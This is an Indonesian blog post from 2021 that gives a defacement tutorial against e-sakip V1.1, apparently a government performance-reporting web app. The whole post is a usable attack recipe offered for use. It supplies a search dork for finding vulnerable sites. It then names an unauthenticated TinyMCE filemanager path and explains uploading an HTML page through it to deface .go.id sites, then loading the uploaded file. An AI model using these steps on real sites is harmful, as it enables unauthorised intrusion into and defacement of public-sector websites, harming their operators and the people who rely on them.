MASIGNASUKAv102
6510051498749449419

Deface e-sakip V1.1

Deface e-sakip V1.1
Add Comments
Minggu, 28 Maret 2021

Hallo Lord Comeback lagi sama mimin tercinta:)

Okeh kali ini mimin mo kasih tutor depes lagi nih:) tutor depes poc e-sakip titip file:)



Bahan:

1. Kopi

2. Rokok

3. Kuota Internet

4. Doi (Bagi yang punya)

5. Dork? 

inurl:/portal/home/kontak_view


Xploit?

plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php


Panggil Script? 

uploads/sc.html


Langsung aja ke tutor yakan:)


1. Kalia dorking dulu pakai dork yang diatas.

Jika sudah kalian masukkan xploitnya.

Contoh:

https://e-sakip.site.go.id/plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php


Jika tampilan seperti dibawah berarti vuln.



Jika tampilan seperti itu kalian klik tulisan upload yang ada di kiri atas, jika sudah kalian upload html kalian:)



2. Bang cara panggilnya gimana?

Site.go.id/uploads/sc.html


Selamat mencoba:)